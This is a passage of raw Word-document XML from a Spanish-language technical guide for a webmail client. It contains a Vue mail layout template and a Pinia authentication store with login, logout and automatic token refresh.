        <w:t xml:space="preserve">&lt;!-- packages/web/src/layouts/MailLayout.vue --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;template&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;div class="flex h-screen bg-white dark:bg-gray-900"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;!-- Sidebar --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;aside class="w-64 flex-shrink-0 border-r border-gray-200 dark:border-gray-700 flex flex-col"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;AccountSwitcher :accounts="accountStore.accounts" /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;FolderList</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        :folders="folderStore.folders"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        :selected="folderStore.selectedId"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        @select="folderStore.select"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        @drop-email="moveEmail"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;div class="mt-auto p-4"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;button</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          @click="router.push('/compose')"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          class="w-full bg-blue-600 hover:bg-blue-700 text-white rounded-lg py-2.5 font-medium transition"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        &gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          Redactar</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/aside&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;!-- Email List --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div class="w-[420px] flex-shrink-0 border-r border-gray-200 dark:border-gray-700 flex flex-col"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;SearchBar v-model="searchQuery" @search="performSearch" /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;VirtualEmailList</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        :emails="emailStore.filteredEmails"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        :selected="emailStore.selectedIds"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        :total="emailStore.total"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        @select="emailStore.toggleSelect"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        @select-one="emailStore.selectOne"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        @scroll-end="emailStore.loadMore"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        @toggle-read="toggleRead"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        @toggle-star="toggleStar"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;!-- Reading Pane --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;main class="flex-1 min-w-0 flex flex-col bg-white dark:bg-gray-900"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;ReadingPaneToolbar</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        :email="emailStore.currentEmail"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        @reply="composeReply"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        @reply-all="composeReplyAll"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        @forward="composeForward"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        @delete="deleteEmail"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        @toggle-star="toggleStar"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;EmailViewer</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        v-if="emailStore.currentEmail"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        :email="emailStore.currentEmail"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        class="flex-1 overflow-y-auto"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;EmptyState v-else message="Selecciona un correo para leerlo" /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/main&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="187"/>
    <w:bookmarkStart w:id="188" w:name="login-multi-cuenta"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.3.3 Login Multi-Cuenta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/web/src/stores/auth.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { defineStore } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'pinia'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { ref } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'vue'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { api } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../lib/api'</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useAuthStore </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">defineStore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'auth'</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accessToken </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ref</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User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isAuthenticated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rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accessToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</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login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(username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'/auth/login'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> password })</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    accessToken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accessToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    user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user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">defaults</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">common</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="String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accessToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">value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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">startRefreshTimer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logout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'/auth/logout'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</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rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    accessToken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user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delete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">defaults</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">common</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Authorization'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Refresh automático del access token cada 10 minutos</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> refreshTimer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ReturnType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">typeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> setInterval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">startRefreshTimer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">() {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    refreshTimer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">setInterval</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'/auth/refresh'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { withCredentials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accessToken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res</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accessToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">defaults</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">common</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="String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accessToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimString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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">logout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accessToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> isAuthenticated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
